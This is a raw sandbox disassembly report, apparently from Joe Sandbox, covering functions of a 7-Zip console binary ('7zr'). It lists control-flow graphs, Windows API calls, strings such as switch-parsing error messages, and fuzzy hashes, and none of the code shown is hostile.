                            control_flow_graph 478 cd993d-cd9950 call cdb5b1 481 cd9963-cd997e call cb1f33 478->481 482 cd9952-cd995e call ca1fb3 478->482 486 cd998f-cd9998 481->486 487 cd9980-cd998a 481->487 482->481 488 cd99a8 486->488 489 cd999a-cd99a6 486->489 487->486 490 cd99ab-cd99b5 488->490 489->488 489->490 491 cd99d5-cd9a04 call ca1e0c call cdacb6 490->491 492 cd99b7-cd99cc GetStdHandle GetConsoleScreenBufferInfo 490->492 500 cd9a0c-cd9a24 call cc7b48 491->500 501 cd9a06-cd9a08 491->501 492->491 494 cd99ce-cd99d2 492->494 494->491 503 cd9a29-cd9a48 call cdb96d call cc7018 call cb1aa4 500->503 501->500 510 cd9a7c-cd9aa8 call ccddb5 503->510 511 cd9a4a-cd9a4c 503->511 518 cd9aaa-cd9abb _CxxThrowException 510->518 519 cd9ac0-cd9ade 510->519 512 cd9a4e-cd9a55 511->512 513 cd9a66-cd9a77 _CxxThrowException 511->513 512->513 515 cd9a57-cd9a64 call cb1ac8 512->515 513->510 515->510 515->513 518->519 521 cd9b3a-cd9b55 519->521 522 cd9ae0-cd9b04 call cc7dd7 519->522 525 cd9b5c-cd9ba4 call ca1fa0 fputs call ca1fa0 strlen * 2 521->525 526 cd9b57 521->526 528 cd9bfa-cd9c0b _CxxThrowException 522->528 529 cd9b0a-cd9b0e 522->529 541 cd9baa-cd9be4 fputs fputc 525->541 542 cd9e25-cd9e4d call ca1fa0 fputs call ca1fa0 525->542 526->525 532 cd9c10 528->532 529->528 531 cd9b14-cd9b38 call cdc077 call ca1e40 529->531 531->521 531->522 535 cd9c12-cd9c25 532->535 545 cd9c27-cd9c33 535->545 546 cd9be6-cd9bf0 535->546 541->545 541->546 554 cd9f0c-cd9f34 call ca1fa0 fputs call ca1fa0 542->554 555 cd9e53 542->555 552 cd9c35-cd9c3d 545->552 553 cd9c81-cd9cb1 call cdb67d call ca2e04 545->553 546->532 547 cd9bf2-cd9bf8 546->547 547->535 556 cd9c3f-cd9c4a 552->556 557 cd9c6b-cd9c80 call ca21d8 552->557 594 cd9d10-cd9d28 call cdb67d 553->594 595 cd9cb3-cd9cb7 553->595 577 cd9f3a 554->577 578 cdac23-cdac2a 554->578 559 cd9e5a-cd9e6f call cdb650 555->559 561 cd9c4c-cd9c52 556->561 562 cd9c54 556->562 557->553 574 cd9e7b-cd9e7e call ca21d8 559->574 575 cd9e71-cd9e79 559->575 567 cd9c56-cd9c69 561->567 562->567 567->556 567->557 586 cd9e83-cd9f06 call cdbde4 fputs call ca1fa0 574->586 575->586 581 cd9f41-cd9f9d call cdb650 call cdb5e9 call cdbde4 fputs call ca1fa0 577->581 584 cdac2c-cdac33 578->584 585 cdac3a-cdac66 call cdb96d call ca1e40 call cc3247 578->585 658 cd9f9f 581->658 584->585 590 cdac35 call cdb988 584->590 619 cdac6e-cdacb5 call ca1e40 call ca11c2 call cdbe0c call cd2db9 585->619 620 cdac68-cdac6a 585->620 586->554 586->559 590->585 616 cd9d4b-cd9d53 594->616 617 cd9d2a-cd9d4a fputs call ca21d8 594->617 600 cd9cb9-cd9cbc call ca315e 595->600 601 cd9cc1-cd9cdd call ca31e5 595->601 600->601 611 cd9cdf-cd9d00 call ca3221 call ca31e5 call ca1089 601->611 612 cd9d05-cd9d0e 601->612 611->612 612->594 612->595 623 cd9dff-cd9e1f call ca1fa0 call ca1e40 616->623 624 cd9d59-cd9d5d 616->624 617->616 620->619 623->541 623->542 630 cd9d5f-cd9d6d fputs 624->630 631 cd9d6e-cd9d82 624->631 630->631 638 cd9d84-cd9d88 631->638 639 cd9df0-cd9df9 631->639 645 cd9d8a-cd9d94 638->645 646 cd9d95-cd9d9f 638->646 639->623 639->624 645->646 651 cd9da5-cd9db1 646->651 652 cd9da1-cd9da3 646->652 656 cd9db8 651->656 657 cd9db3-cd9db6 651->657 652->651 661 cd9dd8-cd9dee 652->661 664 cd9dbb-cd9dce 656->664 657->664 658->578 661->638 661->639 670 cd9dd5 664->670 671 cd9dd0-cd9dd3 664->671 670->661 671->661
                            APIs
                              • Part of subcall function 00CDB5B1: fputs.MSVCRT ref: 00CDB5CA
                              • Part of subcall function 00CDB5B1: fputs.MSVCRT ref: 00CDB5E1
                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 00CD99BD
                            • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00CD99C4
                            • _CxxThrowException.MSVCRT(?,00D555B8), ref: 00CD9A77
                            • _CxxThrowException.MSVCRT(?,00D555B8), ref: 00CD9ABB
                              • Part of subcall function 00CA1FB3: __EH_prolog.LIBCMT ref: 00CA1FB8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                            • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$N
                            • API String ID: 377453556-3661318601
                            • Opcode ID: 76bb0880677d12d09c6e060b6f147e4fa1bef5c4650d62ac1939de1535ce9e66
                            • Instruction ID: 8199c376129b30b62f38b8ea42cfc0c4ba425286a1a77aff206be2746a879fc4
                            • Opcode Fuzzy Hash: 76bb0880677d12d09c6e060b6f147e4fa1bef5c4650d62ac1939de1535ce9e66
                            • Instruction Fuzzy Hash: FE22BE35D00209DFDF15EFA4D885BADBBB1EF48310F20009AE655A7392CB359A85DF61
                            Function 00CB1ADE Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 288COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 672 cb1ade-cb1b14 call d3fb10 call ca13f5 677 cb1b32-cb1b8b _fileno _isatty _fileno _isatty _fileno _isatty 672->677 678 cb1b16-cb1b2d call cc1d73 _CxxThrowException 672->678 680 cb1b9d-cb1b9f 677->680 681 cb1b8d-cb1b91 677->681 678->677 684 cb1ba0-cb1bcd 680->684 681->680 683 cb1b93-cb1b97 681->683 683->680 685 cb1b99-cb1b9b 683->685 686 cb1bf9-cb1c12 684->686 687 cb1bcf-cb1bf8 call cb1ea4 call ca27bb call ca1e40 684->687 685->684 688 cb1c20 686->688 689 cb1c14-cb1c18 686->689 687->686 692 cb1c27-cb1c2b 688->692 689->688 691 cb1c1a-cb1c1e 689->691 691->688 691->692 694 cb1c2d 692->694 695 cb1c34-cb1c3e 692->695 694->695 697 cb1c49-cb1c53 695->697 698 cb1c40-cb1c43 695->698 701 cb1c5e-cb1c68 697->701 702 cb1c55-cb1c58 697->702 698->697 704 cb1c6a-cb1c6d 701->704 705 cb1c73-cb1c79 701->705 702->701 704->705 706 cb1c7b-cb1c87 705->706 707 cb1cc9-cb1cd2 705->707 708 cb1c89-cb1c93 706->708 709 cb1c95-cb1ca1 call cb1ed1 706->709 710 cb1cea call cb1eb9 707->710 711 cb1cd4-cb1ce6 707->711 708->707 716 cb1ca3-cb1cbb call cc1d73 _CxxThrowException 709->716 717 cb1cc0-cb1cc3 709->717 715 cb1cef-cb1cf8 710->715 711->710 718 cb1cfa-cb1d0a 715->718 719 cb1d37-cb1d40 715->719 716->717 717->707 723 cb1dc2-cb1dd4 wcscmp 718->723 724 cb1d10 718->724 721 cb1e93-cb1ea1 719->721 722 cb1d46-cb1d52 719->722 722->721 728 cb1d58-cb1d93 call ca26dd call ca280c call ca3221 call ca3bbf 722->728 726 cb1dda-cb1de6 call cb1ed1 723->726 727 cb1d17-cb1d1f call ca9399 723->727 724->727 726->727 736 cb1dec-cb1e04 call cc1d73 _CxxThrowException 726->736 727->719 735 cb1d21-cb1d32 call d26a60 call ca9313 727->735 756 cb1d9f-cb1da3 728->756 757 cb1d95-cb1d9c 728->757 735->719 745 cb1e09-cb1e0c 736->745 749 cb1e0e 745->749 750 cb1e31-cb1e4a call cb1f0c GetCurrentProcess SetProcessAffinityMask 745->750 751 cb1e10-cb1e12 749->751 752 cb1e14-cb1e2c call cc1d73 _CxxThrowException 749->752 761 cb1e4c-cb1e82 GetLastError call ca3221 call ca58a9 call ca31e5 call ca1e40 750->761 762 cb1e83-cb1e92 call ca3172 call ca1e40 750->762 751->750 751->752 752->750 756->745 760 cb1da5-cb1dbd call cc1d73 _CxxThrowException 756->760 757->756 760->723 761->762 762->721
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB1AE3
                              • Part of subcall function 00CA13F5: __EH_prolog.LIBCMT ref: 00CA13FA
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1B2D
                            • _fileno.MSVCRT ref: 00CB1B3E
                            • _isatty.MSVCRT ref: 00CB1B47
                            • _fileno.MSVCRT ref: 00CB1B5D
                            • _isatty.MSVCRT ref: 00CB1B60
                            • _fileno.MSVCRT ref: 00CB1B73
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1CBB
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1DBD
                            • wcscmp.MSVCRT ref: 00CB1DCA
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1E04
                            • _isatty.MSVCRT ref: 00CB1B76
                              • Part of subcall function 00CC1D73: __EH_prolog.LIBCMT ref: 00CC1D78
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1E2C
                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00CB1E3B
                            • SetProcessAffinityMask.KERNEL32(00000000), ref: 00CB1E42
                            • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00CB1E4C
                            Strings
                            • Unsupported switch postfix for -slp, xrefs: 00CB1DF1
                            • Unsupported switch postfix -bb, xrefs: 00CB1CA8
                            • unsupported value -stm, xrefs: 00CB1E19
                            • Unsupported switch postfix -stm, xrefs: 00CB1DAA
                            • Set process affinity mask: , xrefs: 00CB1D74
                            • SeLockMemoryPrivilege, xrefs: 00CB1D28
                            • : ERROR : , xrefs: 00CB1E52
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                            • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                            • API String ID: 1826148334-1115009270
                            • Opcode ID: aa144eb115b80880a2afa40376e9c8e5566716ed3444b1d6a8c3a59f9afdad60
                            • Instruction ID: 19a93e8da74d588246f266f676e36b52d49e19a4bdbd570b00c9dc300d922b33
                            • Opcode Fuzzy Hash: aa144eb115b80880a2afa40376e9c8e5566716ed3444b1d6a8c3a59f9afdad60
                            • Instruction Fuzzy Hash: 84C1F2719013859FDB11DFB8C899BD9BFF1AF0A304F488459E895972A2C774EA48CB60
                            Function 00CD8012 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 240COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 777 cd8012-cd8032 call d3fb10 780 cd8038-cd806c fputs call cd8341 777->780 781 cd8285 777->781 785 cd806e-cd8071 780->785 786 cd80c8-cd80cd 780->786 782 cd8287-cd8295 781->782 789 cd808b-cd808d 785->789 790 cd8073-cd8089 fputs call ca1fa0 785->790 787 cd80cf-cd80d4 786->787 788 cd80d6-cd80df 786->788 791 cd80e2-cd8110 call cd8341 call cd8622 787->791 788->791 793 cd808f-cd8094 789->793 794 cd8096-cd809f 789->794 790->786 805 cd811e-cd812f call cd8565 791->805 806 cd8112-cd8119 call cd831f 791->806 795 cd80a2-cd80c7 call ca2e47 call cd85c6 call ca1e40 793->795 794->795 795->786 805->782 812 cd8135-cd813f 805->812 806->805 813 cd814d-cd815b 812->813 814 cd8141-cd8148 call cd82bb 812->814 813->782 817 cd8161-cd8164 813->817 814->813 818 cd81b6-cd81c0 817->818 819 cd8166-cd8186 817->819 820 cd8276-cd827f 818->820 821 cd81c6-cd81e1 fputs 818->821 824 cd818c-cd8196 call cd8565 819->824 825 cd8298-cd829d 819->825 820->780 820->781 821->820 826 cd81e7-cd81fb 821->826 829 cd819b-cd819d 824->829 827 cd82b1-cd82b9 SysFreeString 825->827 830 cd81fd-cd821f 826->830 831 cd8273 826->831 827->782 829->825 832 cd81a3-cd81b4 SysFreeString 829->832 834 cd829f-cd82a1 830->834 835 cd8221-cd8245 830->835 831->820 832->818 832->819 836 cd82ae 834->836 838 cd8247-cd8271 call cd84a7 call ca965d SysFreeString 835->838 839 cd82a3-cd82ab call ca965d 835->839 836->827 838->830 838->831 839->836
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD8017
                            • fputs.MSVCRT ref: 00CD804D
                              • Part of subcall function 00CD8341: __EH_prolog.LIBCMT ref: 00CD8346
                              • Part of subcall function 00CD8341: fputs.MSVCRT ref: 00CD835B
                              • Part of subcall function 00CD8341: fputs.MSVCRT ref: 00CD8364
                            • fputs.MSVCRT ref: 00CD807A
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                              • Part of subcall function 00CA965D: VariantClear.OLEAUT32(?), ref: 00CA967F
                            • SysFreeString.OLEAUT32(00000000), ref: 00CD81AA
                            • fputs.MSVCRT ref: 00CD81CD
                            • SysFreeString.OLEAUT32(00000000), ref: 00CD8267
                            • SysFreeString.OLEAUT32(00000000), ref: 00CD82B1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                            • String ID: --$----$Path$Type$Warning: The archive is open with offset
                            • API String ID: 2889736305-3797937567
                            • Opcode ID: f7f9efdaaba80ddc52707a812ef9fbf8cd4b0f5b7ee8fa272d6f8a96ad6b153a
                            • Instruction ID: d5f99bf727fd7326f0624f3fd088cbe4360c0a3ee70b813f080a606033c67b50
                            • Opcode Fuzzy Hash: f7f9efdaaba80ddc52707a812ef9fbf8cd4b0f5b7ee8fa272d6f8a96ad6b153a
                            • Instruction Fuzzy Hash: 6C913B71A00605EFDB14DFA5DD85AAEB7B5FF48310F10412AE612E73A1DB70AE09DB60
                            Function 00CD6766 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 135COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 846 cd6766-cd6792 call d3fb10 EnterCriticalSection 849 cd67af-cd67b7 846->849 850 cd6794-cd6799 call cdc7d7 846->850 852 cd67be-cd67c3 849->852 853 cd67b9 call ca1f91 849->853 854 cd679e-cd67ac 850->854 856 cd67c9-cd67d5 852->856 857 cd6892-cd68a8 852->857 853->852 854->849 858 cd6817-cd682f 856->858 859 cd67d7-cd67dd 856->859 860 cd68ae-cd68b4 857->860 861 cd6941 857->861 862 cd6831-cd6842 call ca1fa0 858->862 863 cd6873-cd687b 858->863 859->858 865 cd67df-cd67eb 859->865 860->861 866 cd68ba-cd68c2 860->866 864 cd6943-cd695a 861->864 862->863 882 cd6844-cd686c fputs call ca2201 862->882 868 cd6933-cd693f call cdc5cd 863->868 870 cd6881-cd6887 863->870 871 cd67ed 865->871 872 cd67f3-cd6801 865->872 867 cd68c4-cd68e6 call ca1fa0 fputs 866->867 866->868 884 cd68e8-cd68f9 fputs 867->884 885 cd68fb-cd6917 call cb4f2a call ca1fb3 call ca1e40 867->885 868->864 870->868 878 cd688d 870->878 871->872 872->863 874 cd6803-cd6815 fputs 872->874 880 cd686e call ca1fa0 874->880 883 cd692e call ca1f91 878->883 880->863 882->880 883->868 889 cd691c-cd6928 call ca1fa0 884->889 885->889 889->883
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD676B
                            • EnterCriticalSection.KERNEL32(00D62938), ref: 00CD6781
                            • fputs.MSVCRT ref: 00CD680B
                            • LeaveCriticalSection.KERNEL32(00D62938), ref: 00CD6944
                              • Part of subcall function 00CDC7D7: fputs.MSVCRT ref: 00CDC840
                            • fputs.MSVCRT ref: 00CD6851
                              • Part of subcall function 00CA2201: fputs.MSVCRT ref: 00CA221E
                            • fputs.MSVCRT ref: 00CD68D9
                            • fputs.MSVCRT ref: 00CD68F6
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                            • String ID: v$Sub items Errors:
                            • API String ID: 2670240366-2468115448
                            • Opcode ID: 8751419272c7992f119f50bb580d1c71f832dfa4a1783463f9bc52ec910ef66a
                            • Instruction ID: 4a1cd8ba45f18749123a19e79aef9e37e1978968f05e3c071a12c7bbad90a005
                            • Opcode Fuzzy Hash: 8751419272c7992f119f50bb580d1c71f832dfa4a1783463f9bc52ec910ef66a
                            • Instruction Fuzzy Hash: A851AA35501740CFCB24AFA4D8A4AAAB7E2FF85314F54442EE6AA87361CB307D44DB64
                            Function 00CD6359 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 898 cd6359-cd6373 call d3fb10 901 cd639e-cd63af call cd5a4d 898->901 902 cd6375-cd6385 call cdc7d7 898->902 908 cd65ee-cd65f1 901->908 909 cd63b5-cd63cd 901->909 902->901 907 cd6387-cd639b 902->907 907->901 910 cd6624-cd663c 908->910 911 cd65f3-cd65fb 908->911 912 cd63cf 909->912 913 cd63d2-cd63d4 909->913 918 cd663e call ca1f91 910->918 919 cd6643-cd664b 910->919 916 cd66ea call cdc5cd 911->916 917 cd6601-cd6607 call cd8012 911->917 912->913 914 cd63df-cd63e7 913->914 915 cd63d6-cd63d9 913->915 922 cd63e9-cd63f2 call ca1fa0 914->922 923 cd6411-cd6413 914->923 915->914 921 cd64b1-cd64bc call cd6700 915->921 929 cd66ef-cd66fd 916->929 932 cd660c-cd660e 917->932 918->919 919->916 924 cd6651-cd668f fputs call ca211a call ca1fa0 call cd8685 919->924 949 cd64be-cd64c1 921->949 950 cd64c7-cd64cf 921->950 922->923 944 cd63f4-cd640c call ca210c call ca1fa0 922->944 930 cd6415-cd641d 923->930 931 cd6442-cd6446 923->931 924->929 983 cd6691-cd6697 924->983 936 cd641f-cd6425 call cd6134 930->936 937 cd642a-cd643b 930->937 940 cd6448-cd6450 931->940 941 cd6497-cd649f 931->941 932->929 938 cd6614-cd661f call ca1fa0 932->938 936->937 937->931 938->916 942 cd647f-cd6490 940->942 943 cd6452-cd647a fputs call ca1fa0 call ca1fb3 call ca1fa0 940->943 941->921 946 cd64a1-cd64ac call ca1fa0 call ca1f91 941->946 942->941 943->942 944->923 946->921 949->950 951 cd65a2-cd65a6 949->951 953 cd64f9-cd64fb 950->953 954 cd64d1-cd64da call ca1fa0 950->954 966 cd65a8-cd65b6 951->966 967 cd65da-cd65e6 951->967 963 cd64fd-cd6505 953->963 964 cd652a-cd652e 953->964 954->953 981 cd64dc-cd64f4 call ca210c call ca1fa0 954->981 973 cd6507-cd650d call cd6134 963->973 974 cd6512-cd6523 963->974 976 cd657f-cd6587 964->976 977 cd6530-cd6538 964->977 978 cd65b8-cd65ca call cd6244 966->978 979 cd65d3 966->979 967->909 970 cd65ec 967->970 970->908 973->974 974->964 976->951 982 cd6589-cd6595 call ca1fa0 976->982 985 cd653a-cd6562 fputs call ca1fa0 call ca1fb3 call ca1fa0 977->985 986 cd6567-cd6578 977->986 978->979 996 cd65cc-cd65ce call ca1f91 978->996 979->967 981->953 982->951 1005 cd6597-cd659d call ca1f91 982->1005 993 cd66df-cd66e5 call ca1f91 983->993 994 cd6699-cd669f 983->994 985->986 986->976 993->916 1000 cd66a1-cd66b1 fputs 994->1000 1001 cd66b3-cd66ce call cb4f2a call ca1fb3 call ca1e40 994->1001 996->979 1006 cd66d3-cd66da call ca1fa0 1000->1006 1001->1006 1005->951 1006->993
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD635E
                            • fputs.MSVCRT ref: 00CD645F
                              • Part of subcall function 00CDC7D7: fputs.MSVCRT ref: 00CDC840
                            • fputs.MSVCRT ref: 00CD6547
                            • fputs.MSVCRT ref: 00CD665F
                            • fputs.MSVCRT ref: 00CD66AE
                              • Part of subcall function 00CA1F91: fflush.MSVCRT ref: 00CA1F93
                              • Part of subcall function 00CA1FB3: __EH_prolog.LIBCMT ref: 00CA1FB8
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog$fflushfree
                            • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                            • API String ID: 1750297421-1898165966
                            • Opcode ID: 1bf03b59c5762b771a2eeb263bce54a82667e73d53ec2e7ee15a4c4de5cd08d9
                            • Instruction ID: 133a1e7412bdd0022241b21977efe1b5c3f5e2ccbde6ad7ce1ae31874248ec44
                            • Opcode Fuzzy Hash: 1bf03b59c5762b771a2eeb263bce54a82667e73d53ec2e7ee15a4c4de5cd08d9
                            • Instruction Fuzzy Hash: F3B16D346017468FDB24EFA4C9A1BAAB7E1FF45304F04452EEA6A47392CB74AE44DF50
                            Function 00CA9C8F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 47libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1016 ca9c8f-ca9cc2 GetModuleHandleA GetProcAddress 1017 ca9cef-ca9d06 GlobalMemoryStatus 1016->1017 1018 ca9cc4-ca9ccc GlobalMemoryStatusEx 1016->1018 1020 ca9d0b-ca9d0d 1017->1020 1021 ca9d08 1017->1021 1018->1017 1019 ca9cce-ca9cd7 1018->1019 1022 ca9cd9 1019->1022 1023 ca9ce5 1019->1023 1024 ca9d11-ca9d15 1020->1024 1021->1020 1025 ca9cdb-ca9cde 1022->1025 1026 ca9ce0-ca9ce3 1022->1026 1027 ca9ce8-ca9ced 1023->1027 1025->1023 1025->1026 1026->1027 1027->1024
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CA9CB3
                            • GetProcAddress.KERNEL32(00000000), ref: 00CA9CBA
                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CA9CC8
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00CA9CFA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                            • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                            • API String ID: 180289352-802862622
                            • Opcode ID: 297f3ff86a04732c04c9413ecfe5f95bc93d7c2ac43c7a2008b7cb1bfcaf2605
                            • Instruction ID: 127cecaf99cce5e8185a9a8584ca969aa0b9d725336d4f1929bf5b163bd78591
                            • Opcode Fuzzy Hash: 297f3ff86a04732c04c9413ecfe5f95bc93d7c2ac43c7a2008b7cb1bfcaf2605
                            • Instruction Fuzzy Hash: FD11577491170A9FCF20DFA4D88ABADBBF5FB05319F200418E442EB280D778A984CF64
                            Function 00D3FF3A Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                            • String ID:
                            • API String ID: 4012487245-0
                            • Opcode ID: 9a981f9b6df6488dfa381b767e4f058cdf0cc7d437caad3c4a7e3e2932d86c49
                            • Instruction ID: f07f885cd00d3dc851fdf50e606f39342253757745ea6b55209dfd1fecdfa0c8
                            • Opcode Fuzzy Hash: 9a981f9b6df6488dfa381b767e4f058cdf0cc7d437caad3c4a7e3e2932d86c49
                            • Instruction Fuzzy Hash: D5211775941748EFCB109FA4EC46AA9BB78FB0AB20F14421AF651E23E1D7B45448CF31
                            Function 00D3FFB1 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                            • String ID:
                            • API String ID: 279829931-0
                            • Opcode ID: 3d681595eea76eaf9d4190580c9317161652acb840d4c587211e65f4c21f1f59
                            • Instruction ID: 2d6c2e030f87ae6aba9d05a296eaf829f11a70953daa7db50da582aa2582d7f7
